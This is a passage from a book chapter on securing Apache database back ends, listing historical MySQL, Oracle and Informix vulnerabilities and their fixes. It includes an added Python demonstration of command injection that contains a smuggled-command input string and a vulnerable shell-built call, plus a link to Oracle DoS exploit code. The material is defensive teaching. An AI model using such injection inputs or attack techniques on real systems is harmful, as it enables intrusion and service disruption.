e If you develop your DBMS on Windows, you'll likely go with data structures 
common to or friendly to Windows. Many Windows folks choose Access. This 
isn’t unusual. A famous auction system online ran on Microsoft Access for 
almost two years. However, Access isn’t secure. Moreover, you don’t have 
Access’ source code, so you don’t know what’s inside—even if you use one of 
those nifty watch-call Windows utilities. So, unless some hacker is kind enough 
to highlight weaknesses in Access and post these conspicuously, you'll never 
know. 
• Designing distributed database systems, especially on Unix or Mac OS X, 
demands in-depth knowledge of IPC and/or sockets. IPC and sockets them- 
selves introduce many security issues. 


e Apache already supports many open source, enterprise-worthy database 
systems, and most such systems plug in via modules, offering you decentral- 
ized, pick-and-choose functionality and features. 


In the end, it’s more secure, less expensive, and less time consuming to choose a 
DBMS that Apache integrates well with—and hopefully, your choice will be open 
source. However, this isn’t always possible. 


Many shops have long-standing contracts or relations with commercial vendors. If 
yours is one such enterprise, you might find yourself using Oracle or DB2 because 
your organization cannot deviate from its contractual obligations. Not a problem. 
Apache supports these solutions, too. Try to shoot for open source when you can, 
however, such as with MySQL, its variants, or PostgreSQL. The more you know about 
your database, the better off you'll be. 


Apache and MySQL 


Apache works seamlessly with MySQL and the combination is excellent, even in 
high-end computing environments. As the MySQL team explains on its Web site at 
http://www.mysql.com: 


MySQL is the world’s most popular Open Source Database, designed for speed, power, and 


precision in mission critical, heavy load use. 


Indeed, MySQL—once a hacking project of limited scope—has become one of Earth’s 
most popular databases, and now runs on many platforms, including the following: 


• FreeBSD 
• Linux 
• NetBSD 
• NT 
• OS/2 
• SCO 
• Solaris 
• Win32 


More than this, MySQL drew substantial attention from independent developers 
worldwide. These individuals and groups developed many tools that gave MySQL 
additional features it did not initially have. This development wave led to the release 
of widely diverse utilities and technologies, including the following: 


• APIs 
• Authentication tools 
• Clients 
• Converters 
• Performance benchmarking tools 
• Tools to integrate MySQL with other products 
• Web tools 
• Windows programs 


MySQL also employs the client-server model, so you can use it to house your 
database on one machine and your Web interface on another. The Web server can 
stay outside the firewall, while MySQL stays inside, cozy and snug. (Oracle and other 
high-end packages support this arrangement too, via SQL*Net, for example.) 


Indeed, MySQL—notwithstanding its hacker-oriented cultural roots—is now an 
enterprise-worthy DBMS, and a fast one to boot. Table 5.1 gives an indication of how 
fast. The data summarizes MySQL’s performance against other systems when reading 
in two million rows by index. 


TABLE 5.1 MySQL Comparative Performance at Two Million Rows by Index 

Database          Performance 
mysql             367 sec 
mysql_odbc        464 sec 
db2_odbc          1206 sec 
informix_odbc     121126 sec 
ms-sql_odbc       1634 sec 
oracle_odbc       20800 sec 
solid_odbc        877 sec 
sybase_odbc       17614 sec 


Roughly, MySQL outperformed Oracle by a margin of 56:1, and Informix by 330:1 
(under the specified conditions, with ODBC). For further information, check the 
MySQL benchmark index, located here: 
http://www.mysql.com/information/benchmarks.html. 

Apache interfaces with MySQL—as with most external applications it deals with—by 
modules. Historically, it has done this through 

• mod_mysql 
• mod_mysql_include 
• Perl DBI modules 
• PHP modules 


mod_mysql 

In his online article "Using the Module MySQL," Peter Verhas describes mod_mysql as 
a tool that enables developers to talk to MySQL through ScriptBasic. For more 
information, please see http://www.scriptbasic.com. 


mod_mysql_include 

mod_mysql_include is a MySQL Apache module that returns SQL query information 
in HTML. The author, Sascha Pechav, originally wrote mod_mysql_include to provide 
a low-overhead banner rotation system that enabled developers to embed MySQL 
query output into HTML. 


PHP Modules 


PHP is a powerful tool for interfacing with databases—especially MySQL. Its authors 
describe it as 


...a Widely-used general-purpose scripting language that is especially suited for Web develop- 
ment and can be embedded into HTML. 


PHP lets you nest your SQL queries in server-side code embedded in HTML files with 
a .phtml, .php, .php3, or .php4 extension. When Apache hands such a file to the PHP 
interpreter, PHP executes the embedded code, and any queries it contains go straight 
to your database. I cannot express how fast this process is. At least not without 
giving a concrete example. 


In late 2001, a firm approached me about its newly founded Web site. For compli- 
cated reasons, firm managers wanted to keep the servers in Florida, but the data in 
California. They knew—at least in a general way—that this configuration, which had 
serious network failure issues, would slow down queries. If nothing else, the sheer 
distance that packets would cover was significant. 


I recommended Apache, MySQL, and PHP, and we implemented the plan. As I write 
this, their site is getting approximately 1,000 hits an hour—not many. Hence, it 
would be difficult to ascertain how their Apache, MySQL, and PHP configuration 
would operate under heavy stress. But I do know this: traversing a half-million 
records on a four-way trip, Apache takes less than a second to return a search result. 
The four-way trip happens like this: 

1. A user in New York initiates a search on a Florida machine. 
2. The Florida machine contacts California. 
3. California pulls and forwards the results. 
4. The Florida machine relays the data to New York. 


So, adding PHP will significantly increase the speed you'll realize, and in this specific 
area, PHP blows away standard Perl DBI. However, that’s not the story’s end. 


PHP enables you to do extraordinary things, true. But it also has a long security 
history. We’ll cover it extensively in Chapter 12, “Hacking Secure Code: Apache at 
Server Side,” and Chapter 13, “Hacking Secure Code: Apache at Client Side,” but it’s 
worth noting here that PHP has had in the past (and will likely have in the future) 
serious security issues, issues that often result in server compromise. Take care when 
writing applications in PHP, and if there’s any rule to apply always, it’s this: Never 
construct command lines from user input. 
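The rule deserves a concrete illustration. What follows is an added example, not code from the book or from PHP: a hypothetical whois-style lookup feature takes a hostname from a form, and one version interpolates it into a shell command line (the equivalent of PHP's system("whois $host")) while the other validates the value and hands it to the program as a single argument with no shell involved. The command actually run is printf rather than whois, so the demonstration is harmless and works offline; the attacker's input string is constructed for the example.

```python
"""Command-line construction from user input, vulnerable and fixed.

Added example (not from the book). Runs `printf` instead of a real lookup
tool so it is safe to execute anywhere a POSIX shell exists.
"""
import re
import subprocess

# Hostnames: letters, digits, dots and hyphens only (a deliberately strict allowlist).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def lookup_unsafe(host):
    """Builds a shell command line from user input; the shell parses `;`, `|`, etc."""
    cmd = "printf '%s' " + host          # same shape as system("whois $host") in PHP
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def lookup_argv(host):
    """Passes the input as one argv element; no shell ever sees it, so it stays literal."""
    return subprocess.run(["printf", "%s", host], capture_output=True, text=True).stdout


def lookup_safe(host):
    """Validate against the allowlist first, then use the argv form."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    return lookup_argv(host)


def is_rejected(host):
    """True if lookup_safe refuses the input (convenience for checks)."""
    try:
        lookup_safe(host)
    except ValueError:
        return True
    return False


# Constructed attacker input: terminates the intended command and runs another.
INJECTED_HOST = "example.com; echo INJECTED"

if __name__ == "__main__":
    print(repr(lookup_unsafe(INJECTED_HOST)))   # 'example.comINJECTED\n'
    print(repr(lookup_argv(INJECTED_HOST)))     # the string itself, nothing executed
    print(is_rejected(INJECTED_HOST))           # True
```

Both halves of the fix matter. The argv form alone already stops the injection, but validation keeps attacker-controlled strings from reaching the program as arguments it might interpret itself (option flags, for instance), which is why lookup_safe does both.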


Vulnerabilities in or Associated with MySQL 


MySQL's tight design results in precious few holes. Most security issues instead 
revolve around tools that work in concert with MySQL. Table 5.2 covers the most 
recent security events in both categories. 


TABLE 5.2 MySQL Vulnerabilities 

Vulnerability             Description 

AdCycle SQL Attack 
    AdCycle (http://www.adcycle.com/) is a powerful software suite powered by 
    MySQL that manages advertisements on hosts. It offers many features, 
    including IP, page, and keyword targeting (context-sensitive ads), 
    impression and click frequency tracking, and so forth. The developers 
    wrote it in Perl. Versions 1.12, 1.13, 1.14, 1.15, 1.16, and 1.17 all have 
    multiple holes that enable remote attackers to alter SQL queries. As this 
    went to press, I could find no evidence of a resolution. Check with 
    AdCycle. 

AdRotate SQL Attack 
    AdRotate Pro 2.0, a powerful banner ad rotation system, offers SSI and 
    IMG tag support, unlimited rotations, expire-by-date, views or clicks, 
    default ads, ad weighting, custom user stats, and many other features. 
    Unfortunately, AdRotate builds SQL queries and command lines from poorly 
    filtered user input. Furthermore, AdRotate passes some such commands to 
    the shell. This of course introduces all sorts of security issues. As of 
    this writing, I could find no fix. AdRotate is located at 
    http://www.vanbrunt.com/adrotate/. 

Aktivate 
    Aktivate is a shopping cart application, chiefly deployed on Linux. (Learn 
    more about it at http://www.allen-keul.com/aktivate/.) Powered by MySQL, 
    Aktivate is vulnerable to cross-site scripting attacks that can lead to 
    session hijacking. Version 1.03 is reportedly affected, and to date, the 
    vendor has supplied no patch. Thus, users can only protect themselves by 
    disabling scripting in their browser. 

Conectiva Exposed Logs 
    Conectiva Linux 5.1, 5.6, and 6.0 unpack /var/log/mysql as world-readable, 
    thus allowing any user to examine the contents therein. This was a serious 
    issue because /var/log/mysql contains significant intelligence (such as 
    usernames, passwords, and even account creation). The easy fix is to 
    simply alter the permissions, for example, chmod 600 /var/log/mysql*. 

DOOW Permission Issue 
    DOOW is a tool for building knowledge bases with MySQL. In DOOW v0.2.2's 
    release notes, DOOW's designers revealed that earlier DOOW versions didn't 
    aggressively check user permissions. This wasn't a catastrophic error, but 
    it will allow unauthorized users to access protected or restricted site 
    areas. The solution is here: http://prdownloads.sourceforge.net/doow/. 

GeekLog Cookie Attack 
    GeekLog (http://geeklog.sourceforge.net), which some consider the ultimate 
    user logging system, had a flaw in version 1.3. The system, driven by 
    MySQL, tracks users via user IDs nested in cookies. Attackers can 
    naturally alter these values, and gain unauthorized access to user 
    accounts. The developer has since addressed this issue, and you can 
    upgrade to fix the problem. 

mod_auth_mysql 
    Vivek Khera's mod_auth_mysql is an Apache authentication module for MySQL. 
    (Learn more at ftp://ftp.sage-au.org.au/pub/network/www/apache-msql/.) 
    mod_auth_mysql provides database authentication via MySQL. The affected 
    version (1.9) enables remote attackers to inject SQL commands and, in 
    limited circumstances, alter tables. Find the upgrade at 
    ftp://ftp.kcilink.com/pub/. 

MySQL Symlink Attack 
    Versions 3.20.32a and 3.23.34 harbored a hole whereby local users could 
    attack MySQL and ultimately, even the underlying system. Local users 
    could—if they had CREATE TABLE permissions—link to a root-writable file 
    in /var/tmp and use this to overwrite data in a specified table of the 
    same name. An upgrade exists to solve the problem. 

PHPNuke Debug Hole 
    PHPNuke is a management tool that provides administrative control over 
    Web accounts (and other issues) through MySQL and many other databases. 
    It contains debugging features. On January 18, 2002, Cabezon Aurélien 
    reported that remote attackers could send a custom URL that will give 
    them access to intelligence information about queries and server setup. 
    Although no official patch or advisory has been issued, reports indicate 
    that you can bypass this vulnerability by commenting out the line 
    $sql_debug in sql_layer.php. The hole affects versions 3.23.30, 3.23.31, 
    3.23.34, and 3.23.36. 

PHPWebThings 
    Peter Vreugdenhil discovered a hole in PHPWebThings, for which FreshMeat 
    later issued a patch at 
    http://freshmeat.net/redir/phpwebthings/15746/url_zip/phpwebthings.zip. 
    The problem was this: If attackers knew you were running PHPWebThings, 
    they could pass malicious CGI values through it and thus modify incoming 
    SQL queries (perhaps revealing the entire underlying database). 

WinMySQLadmin 
    WinMySQLadmin (like mysqlfront) enables Windows users to manage local or 
    remote MySQL databases in a friendly, tabular, and column-based graphical 
    interface (which beats trying to compress or read mysql client or 
    mysqladmin output on simple terminals). Unfortunately, WinMySQLadmin 1.1 
    stores your passwords in my.ini in clear text. No fix has been 
    forthcoming, so the solution is to set restrictive permissions on my.ini. 

Xoops Injection Attack 
    Xoops is a MySQL-friendly and PHP-driven Web portal package, available at 
    http://xoops.sourceforge.net/modules/news/, which enables you to control 
    user administration, site administration, and other tasks. Built to 
    interface with MySQL (and PHP-aware), Xoops could save you a lot of time. 
    In January 2002, Cabezon Aurélien, an independent researcher, determined 
    that a script in the Xoops distribution (userinfo.php) does not filter 
    metacharacters. Thus attackers using a custom-crafted URL can crash the 
    service. No solution has yet been forthcoming. However, it's not a hard 
    problem: you can add a custom allowlist filter such as 
    s/[^a-zA-Z0-9\-=_]//g; to the script. This hole would affect any MySQL 
    version that you team up with Xoops. 





NOTE

Also, note that one common mistake administrators make is failing to change MySQL's default
password. (This is a common problem with many database packages, not merely MySQL.)
After installation, scour your package's documentation to ascertain if default passwords exist,
and if so, change them immediately.
PostgreSQL


PostgreSQL springs from the PostGRES package written at Berkeley, and shares many 
characteristics with Ingres. PostgreSQL is an advanced open source, object-oriented, 
relational database package that interfaces with several popular CGI languages, 
including but not limited to C, C++, Java, Perl, Tcl, and Python. 


PostgreSQL supports a wide range of advanced features, including but not limited to 
multi-version concurrency control, subselects, defaults, constraints, triggers, primary 
keys, quoted identifiers, literal string type conversion, type casting, and binary and 
hexadecimal integer input. 


PostgreSQL is a popular RDBMS to integrate with Apache, and for good reason. It’s 
fast, reliable, and most importantly, it’s had only a meager security history 
(although, tools for use in concert with it have had security issues). 


NOTE 


Indeed, PostgreSQL's only major vulnerability emerged in versions 6.3.2 and 6.5.3. Both
versions stored user passwords in plain text in a root-readable file. See
http://online.securityfocus.com/bid/1139 for more information.





Table 5.3 describes some common modules and tools for integration with 
PostgreSQL. 


TABLE 5.3 Apache PostgreSQL Tools

Tool or Utility    Description

Apache-Session    This module from Jeffrey Baker handles many Apache session
issues, such as persistent cookies, tracking users, MD5 authentication, and so
forth. It includes (among some 30 other tools) database-driven support for user
sessions using PostgreSQL. Get it at
http://www.cpan.org/authors/id/JBAKER/Apache-Session-1.54.tar.gz.

heitml    From Helmut Emmelmann, Extended Interactive is an HTML-programmable
database extension of HTML that enables developers to quickly assemble HTML
pages on the fly from embedded database structures. This package uses mSQL,
Postgres, and Yard. Get it at http://www.h-e-i.de/heitml.

mod_aolserver    This module from Robert S. Thau and Rob Mayoff is an AOLserver
API emulator; it emulates enough of the AOLserver Tcl API to run the ArsDigita
Community System. It interfaces with Apache, Tcl, and Oracle or PostgreSQL. Find
it at http://www.arsdigita.com/download/.

mod_auth_pgsql    This module from Giuseppe Tanzilli is an authentication module
for Apache 1.3 to PostgreSQL. Get it at
http://www.giuseppetanzilli.it/mod_auth_pgsql/.

mod_pointer    This module from Thomas Eibner maps domains to homepages elsewhere
(a kind of redirect system based on databases). It uses either MySQL or
PostgreSQL for storing mappings. Get it at http://www.stderr.net/mod_pointer/.

RADpage    A utility from H.E.I., RADpage is a browser-based Rapid Application
Development tool that enables users to rapidly build XML applications and
middleware. It works with Postgres, Adabas, and MySQL. Get it at
http://www.radpage.com.

TalentSoft WebPlus    This tool from Victor Tong is a Web+ (WebPlus) application
development tool/database middleware. It currently supports Linux, Apache API,
MySQL, miniSQL, and PostgreSQL. Get it at http://www.talentsoft.com.





Apache and Commercial SQL Packages 


Apache also interfaces with many commercial databases, including Oracle and 
Informix. Let’s take a quick look at those now. 


Apache and Oracle 


Apache interfaces well with Oracle, and I’ve personally had nothing but good luck 
with this combination on Solaris, Apache 1.3, Oracle 8, and Oracle Application 
Server. However, before you purchase Oracle, consider several points. 


First, if you’re like most folks who bought, borrowed, or stole this book, you’re 
working with Linux, a BSD variant, or Windows. If so—and you've had no previous 
Oracle experience—know this: Oracle is different than other databases out there. It 
has a unique installation procedure, method of operation, and security model. 


Oracle is also large and involved. You'll need 700 megabytes of disk space, a swap 
area double your RAM size, and clear partitions set aside expressly for Oracle. That is, 
Oracle resides on its own disk partitions (or should), and hence it’s not something 
that you simply toss on an already-populated disk drive. 


Indeed, introducing Oracle into any environment requires forethought. It might 
seem incredible, but engineers exist whose sole function in life (other than enjoying 
it) is to eyeball Oracle installation plans, make recommendations, and supervise the 
process—and these folks come armed with calculators to do on-the-spot analysis of
your partition balancing. 


Oracle’s new direction, furthermore, which Oracle adopted to keep up with technol- 
ogy’s advance, anticipates a Java-based world. Newer Oracle releases deploy Java 
extensively. Thus, if you choose Oracle—a major commitment—you’ll need at least 
one Java specialist on hand. 


From a purely administrative standpoint, Oracle provides an additional security layer 
and classifies all accessible objects as one of two things: resources anyone can access, 
and those only DBAs can access. If you apply—in addition to this model—your oper- 
ating system’s permission scheme, you'll emerge with a tight ship (notwithstanding 
several issues we'll discuss later in this chapter). 


On installation, Oracle makes at least two (and in some cases, more) default 
accounts, of which these are key: 


• SYS—The SYS account is a standard Oracle account with DBA privileges that
owns your base tables.

• SYSTEM—The SYSTEM account is a standard Oracle account with DBA privileges
that enables you to create additional tables or views. You generally use this
account to maintain databases, and only DBAs should have access.


NOTE 


Newer Oracle releases create default accounts (for training or demonstration purposes) whose 
logins and passwords are well known. After an installation, be sure to check what default files 
Oracle created. (This very issue opened a serious security hole.) 





You defend against unauthorized access to these accounts from the inside, whereas 
from the outside you defend against remote attackers gaining user-level access, access 
to services in unintended or unauthorized ways, or denying service. 


Oracle-Related Vulnerabilities 

Although Oracle’s advertising campaigns—several of which assert that Oracle is 
unbreakable—seem tough and hard-nosed, Oracle nonetheless has a significant secu- 
rity history. Most of the recent issues, however, admittedly revolve around new 
Oracle technologies, such as Web Cache (Oracle Web Cache caches static and 
dynamically generated Web pages). Table 5.4 summarizes the most recent Oracle 
issues. 


NOTE


To access Oracle support pages, you may need to register with its site. 
TABLE 5.4 Oracle-Related Vulnerabilities

Vulnerability    Description

9iAS Cache Overflow    Oracle9iAS Web Cache 2.0.0.2 (NT) and 2.0.0.1 choke when
attackers send a certain URL. Unlike other Web Cache DoS vulnerabilities, this
one can be critical: An attacker can, under some conditions, pump processor
utilization to 100%, thereby killing the box. Oracle patched this in
December-January 2001. Get the fix at http://metalink.oracle.com.

9iAS Cache Permissions    In Oracle9iAS Web Cache and Application Server 2.0.0.2,
2.0.0.1, and 2.0.0.0, the permissions derived when starting the system with
$ORACLE_HOME/webcache/bin/webcached enable attackers to undertake tasks as user
oracle. Oracle patched this in January 2002. Get the fix at
http://metalink.oracle.com.

9iAS Cached Password    In Oracle9iAS Web Cache and Application Server 2.0.0.2,
2.0.0.1, and 2.0.0.0, Web Cache exposes the administrator password in a
world-readable file. Oracle patched this in January 2002. Get the fix at
http://metalink.oracle.com.

9iAS Web Cache DoS    Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and
2.0.0.0 all choke when attackers send successive period notations to port 4000.
This will hang Web Cache. Oracle patched this in January 2002. Get the fix at
http://metalink.oracle.com.

9iAS Web Cache DoS    Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and
2.0.0.0 all choke when attackers send successive null characters to ports 1100,
4000, 4001, and 4002. This will hang Web Cache. Oracle patched this in January
2002. Get the fix at http://metalink.oracle.com.

9iAS Web Cache DoS    Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and
2.0.0.0 all choke when attackers send HTTP requests containing headers with a
Content Length of 0 plus three 0a character combinations. This will hang Web
Cache. Oracle patched this in January 2002. Get the fix at
http://metalink.oracle.com.

Auditing System    Oracle8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6,
8.1.7.1, 8.1.7, as well as Oracle9i 9.0 and 9.0.1 all ship without auditing
turned on, and therefore don't track user activity. Turn it on. If you don't,
Oracle will fail to record activity.

dbsnmp DoS    Oracle 8i versions 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6,
8.1.7.1, and 8.1.7 run the TNS listener service. If remote attackers send
dbsnmp_start or dbsnmp_stop directives to this service, a DoS condition will
result. To test this theory, download and try this code:
http://downloads.securityfocus.com/vulnerabilities/exploits/dbsnmp.c. Oracle has
not yet issued a patch for this. TNS (Transparent Network Substrate) Listener
handles remote communications with Oracle database services, and therefore is
essential in many cases. Here, your best bet—until Oracle issues a fix—is to
filter incoming traffic using a firewall. Designate the hosts you want to have
TNS access.

Default Accounts    Oracle 8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6,
8.1.7.1, 8.1.7, Oracle 9i, 9.0, and 9.0.1 all install several default accounts
for testing purposes. The installation routine sets the passwords for these
accounts (and those passwords are now well known on the Net). Attackers
approaching systems that retain these accounts can gain Oracle access. The
solution is to delete or disable default accounts.

mod_auth_oracle    mod_auth_oracle is an authentication module, originally
designed by Serg Oskin for Oracle7 or Oracle8/8i clients. It gained more
widespread use in Apache 1.3 plus Oracle8/8i and offers database-based
authentication using Oracle. Affected versions enable remote attackers to send
SQL commands and, in limited circumstances, alter tables. Update to 0.5.4,
located here: http://www.macomnet.ru/~oskin/mod_auth_oracle.html.

Path Disclosure    Oracle 9i Application Server ships with Apache and a Java
engine for JSP/servlets. Learn more at http://www.oracle.com/ip/. With Oracle9i,
when attackers send a request for a JSP file that doesn't exist, it reveals
internal Web paths. It throws a javax.servlet.ServletException message and
reports that the system cannot find the specified file
(http://[path]/[file.jsp]). You should upgrade to OJSP 1.1.2.0.0, which can be
found here: http://otn.oracle.com/software/tech/java/servlets/content.html.

PL/SQL Buffer Overflow    Oracle 9iAS ships with a PL/SQL Apache module that
provides Database Access Descriptors (DAD) management facilities. This module,
ModPL/SQL for Apache, is bundled with all versions of iAS, and serves as a
gateway to call PL/SQL procedures from the Web. On Solaris, Windows NT/2000
Server, and HP-UX, the module suffers from a buffer overflow, which invites DoS
and even the execution of arbitrary code. Get the patch here:
http://metalink.oracle.com.

Shell Code Access    Oracle 8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6,
8.1.7.1, 8.1.7, Oracle 9i, 9.0, and 9.0.1 all allow legitimately logged-on users
(via SQL*Plus) to execute shell commands on the target. Couple this with the
default account vulnerabilities also listed here, and you have a recipe for
disaster. Answer: see
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=solution&id=3900.
Apache and Oracle Tools


Apache and Oracle come from different cultures. Apache is an open source solution
most commonly championed by Linux users. Oracle, on the other hand, is a pack-
aged and well-supported product, and its foray into the Net's freer regions is
still new.


Because of this, many Oracle tools were historically commercial applications or utili- 
ties. As Apache gained popularity (and interfaces from Oracle to Apache emerged), 
however, the networking community expressed a need for tools to draw Oracle closer 
and tighter into traditionally open source environments. Table 5.5 summarizes a few 
important tools that emerged as a result of this process. 


NOTE 


Some of the URLs below trigger immediate downloads. I chose them because all the modules
are free and have no documentation page but rather contain documentation in the zipped
files themselves.


TABLE 5.5 Oracle/Apache Tools

Tool    Description

Apache-DnsZone    Thomas Eibner (thomas@cpan.org) wrote this Perl module, which
provides Apache::DnsZone, Apache::DnsZone::AuthCookie, Apache::DnsZone::Config,
Apache::DnsZone::DB, Apache::DnsZone::DB::MySQL, Apache::DnsZone::DB::Oracle,
Apache::DnsZone::DB::Postgresql, Apache::DnsZone::Language, and
Apache::DnsZone::Resolver. This will essentially handle DNS. Get it at
http://www.cpan.org/authors/id/T/TH/THOMAS/Apache-DnsZone-0.2.tar.gz.

Apache-Session    Jeffrey Baker (jwbaker@acm.org) wrote this Perl module, which
provides a huge number of session-management components, including
Apache::Session, a persistence framework for session data;
Apache::Session::DB_File, Apache::Session::File, Apache::Session::Flex (specify
everything at runtime); Apache::Session::Generate::MD5 (use MD5 to create random
object IDs); Apache::Session::Generate::ModUniqueId (mod_unique_id for session
ID generation); Apache::Session::Generate::ModUsertrack (mod_usertrack for
session ID generation); Apache::Session::Lock::File (mutual exclusion using
flock); Apache::Session::Lock::MySQL (mutual exclusion using MySQL);
Apache::Session::Lock::Null, Apache::Session::Lock::Semaphore (mutual exclusion
through semaphores); Apache::Session::MySQL, Apache::Session::Oracle,
Apache::Session::Postgres, Apache::Session::Serialize::Base64,
Apache::Session::Serialize::Storable (zip up persistent data);
Apache::Session::Serialize::Sybase (zip up persistent data and unpack/pack to
put into Sybase-compatible image field); Apache::Session::Serialize::UUEncode,
Apache::Session::Store::DBI, Apache::Session::Store::DB_File,
Apache::Session::Store::File, Apache::Session::Store::MySQL,
Apache::Session::Store::Oracle, Apache::Session::Store::Postgres,
Apache::Session::Store::Sybase, and Apache::Session::Sybase. Get it at
http://www.cpan.org/authors/id/JBAKER/Apache-Session-1.54.tar.gz.

auth_oracle_module    Serg Oskin (oskin@macomnet.ru) wrote this free
authentication module for Apache 1.3 plus Oracle8. To use it, you need an Oracle8
client. Get it at http://www.macomnet.ru/~oskin/mod_auth_oracle.html.

mod_aolserver    Robert S. Thau and Rob Mayoff wrote this very focused tool that
essentially emulates the AOLserver API (certainly, enough of the AOLserver Tcl
API to run the ArsDigita Community System). To contact them, try this address:
info@arsdigita.com. To run it, you must be running Apache, Tcl, MM, and Oracle
or PostgreSQL. Get it here: http://www.arsdigita.com/download/.

mod_auth_ora7    Ben Reser (ben@reser.org) wrote this Oracle authentication
module for Oracle 7 and Apache 1.2 (older versions that you might still use if
you've tweaked your system to a degree sufficient to preclude straightforward
upgrades). Get it at http://ben.reser.org/mod_auth_ora/.

mod_auth_ora8    Ben Reser (ben@reser.org) also wrote this Oracle authentication
module for Oracle 8 and Apache 1.3. Get it at
http://ben.reser.org/mod_auth_ora/.

mod_auth_oracle/win32    Karsten Pawlik and Serg Oskin wrote this GPL
authentication tool for Apache 1.3 or greater and Oracle 8. It authenticates
against an Oracle8.x.x database plus Apache 1.3.x (and also supports mod_ssl),
but it's for Win32 strictly. Contact them at info@designlab.de or get the tool
here: http://www.designlab.de/service_support/downloads/downloads/mod_auth_oracle.zip.

mod_ora_plsql    Michael Mikhaylov (mikx@izba.com) wrote this free module that
lets you run Oracle PL/SQL stored procedures without using an OWS or OAS server.
(Pretty cool...this could save you a bundle.) It requires Apache 1.3.x and at
least Net8. Get it at http://plsql.izba.com/.

mod_owa    Alvydas Gelzinis (alvydas@kada.lt) and Oksana Kulikova wrote this
free replacement for the OWS PL/SQL cartridge. Note that this requires at least
Apache/1.3.x and Oracle SQL*Net. Get it here:
http://www.kada.lt/alv/apache/mod_owa/.

PL/SQL Server Pages    Finn Ellebaek Nielsen wrote this commercial tool that
compiles PL/SQL Server Pages. It executes the resulting stored procedure by
making a server redirect to another module. To use it, you need Oracle 7.3, 8.0,
or 8.1. Contact Mr. Nielsen at info@changegroup.dk or get it at
http://www.changegroup.dk/en/cgpsp.htm.





Apache and Informix 


Apache and Informix is an odd mix. One would expect that if you purchased 
Informix, you’d also use IBM’s entire suite. However, not everyone does. Can Apache 
and Informix work together? You bet. Marco Greco authored the Apache/Informix 
FAQ, which you'll find at http://www.iiug.org/resources/linux/Howto_DBD.html.


To do it, however, you'll need Perl 5.003+, Apache 1.2 or better, ESQL/C 5.x+ or
Client SDK 2.x+, Informix-4gl compiled 6.x+, DBI, and DBD::Informix. To get
DBD::Informix—really, the only odd component out—go to
http://cpan.valueclick.com/modules/by-module/DBD/.


Informix-Related Vulnerabilities 
Informix, like most enterprise databases, offers excellent security features. However, 
every so often, you'll see a weakness. Table 5.6 summarizes a few recent ones. 
TABLE 5.6 Informix-Related Vulnerabilities

Vulnerability    Description

Backup File Overwrite    onbar_d, ondblog, and onsmsync—components of Informix's
backup solution—all create files with known names in /tmp. (OnBar is an Informix
backup and restore utility that works with an XBSA-shared library to a storage
library system. OnBar connects to a storage manager to send Informix data and
pages to utilities like HP OmniBack.) Attackers can trigger these programs,
which are all installed setuid root and setgid informix. No fix has been issued
yet, so in the meantime, strip the setuid and setgid from these files, and force
them to create files with names not so easy to predict. Affected versions are
Informix SQL 7.31.UC5 on Conectiva ecommerce, Graficas 6.0 and 7.0; Debian 2.2;
Mandrake 7.0, 7.1, 7.2, and 8.0; Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE 7.0,
7.1, and 7.2; Slackware 7.0 and 7.1; and Solaris 2.7 and 7.0.

DataBlade Directories    Informix's Web DataBlade module provides file
management and especially big binary support when you store images, videos,
sound, maps, or other media in your database. DataBlade goes beyond a simple
management tool, though, and developers use it to collaborate on gigs where some
development team members are located some distance away. At any rate, affected
versions harbor a directory traversal hole. Attackers who send successive ../
sequences can view directories, and maybe even break out of DocumentRoot. IBM
caught this. Obtain the patch at
http://www-4.ibm.com/software/data/informix/support/. Affected versions are
Informix Web DataBlade 3.3 SQL, 7.31.UC5, SQL 9.20.UC2, 3.4, SQL 7.31.UC5, SQL
9.20.UC2, 3.5, SQL 7.31.UC5, SQL 9.20.UC2, 3.6, SQL 7.31.UC5, SQL 9.20.UC2, 3.7,
SQL 7.31.UC5, SQL 9.20.UC2, 4.10, SQL 7.31.UC5, SQL 9.20.UC2, 4.11, SQL
7.31.UC5, SQL 9.20.UC2, 4.12, SQL 7.31.UC5, and SQL 9.20.UC2.

onsrvapd File Overwrite    onsrvapd, a component of Informix's SNMP solution,
creates a file with a well-known name in /tmp. Attackers can exploit this
because onsrvapd installs setuid root and setgid user informix. No fix has been
issued yet, so in the meantime, strip the setuid and setgid from this file and
force it to create files with names not so easy to predict. Affected versions
are Informix SQL 7.31.UC5 on Conectiva ecommerce; Graficas 6.0 and 7.0; Debian
2.2; Mandrake 7.0, 7.1, 7.2, and 8.0; Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE
7.0, 7.1, and 7.2; Slackware 7.0 and 7.1; and Solaris 2.7 and 7.0.

snmpd File Overwrite    Informix's SQL package in affected versions allows remote
attackers to overwrite /tmp/snmpd.log and piggyback this to escalated privileges
via snmpdm, the Simple Network Management Protocol Daemon, which installs setuid
root. snmpd starts and creates /tmp/snmpd.log, a fact well known to the
networking community. To date, no vendor has issued a patch, and it's easy to
understand why. When starting snmpd, specify an alternative log file using the
-I log file option. Affected versions are IBM Informix SQL 7.31.UC5 on Conectiva
ecommerce; Graficas 6.0 and 7.0; Debian 2.2; Mandrake 7.0, 7.1, 7.2, and 8.0;
Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE 7.0, 7.1, and 7.2; Slackware 7.0 and
7.1; and Solaris 2.7 and 7.0.

WebDriver File Overwrite    WebDriver, Informix's Web interface to the database,
will sometimes, in limited cases, write temp files insecurely, leading to file
overwrites and perhaps system compromise. There is no known fix. Try an upgrade.

WebDriver Remote Access    WebDriver, Informix's Web interface to the database,
will sometimes, under very limited conditions, retrieve the management page and
display it to unauthorized users. There, unauthorized users can alter data.
Attackers do this by calling a script that would normally have variables
attached to it with no variables or arguments. There's no fix yet, but the
problem was limited to Version 1.0. Try an upgrade.
